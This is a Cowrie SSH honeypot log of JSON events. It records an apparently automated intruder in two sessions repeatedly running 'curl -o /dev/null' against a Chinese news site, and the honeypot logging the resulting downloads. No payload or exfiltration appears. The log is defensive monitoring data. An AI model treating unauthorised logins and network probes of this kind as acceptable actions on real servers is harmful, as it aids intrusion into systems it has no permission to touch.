{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.085556Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.088769Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.091275Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.093731Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.096791Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.099267Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.101763Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.106319Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.109097Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.112054Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.116350Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.119627Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.122447Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.126157Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.129035Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.131817Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.134426Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.136754Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.139393Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.142313Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.144636Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.147017Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.149551Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.151935Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.154177Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:51.157606Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.159772Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:51.163481Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.164416Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.169701Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.172274Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.174828Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.177424Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.179939Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.182205Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.184718Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.187236Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.189696Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.192489Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.195089Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.197505Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.200259Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.202646Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.205069Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.208235Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.211115Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.213727Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.216267Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.218642Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.221058Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
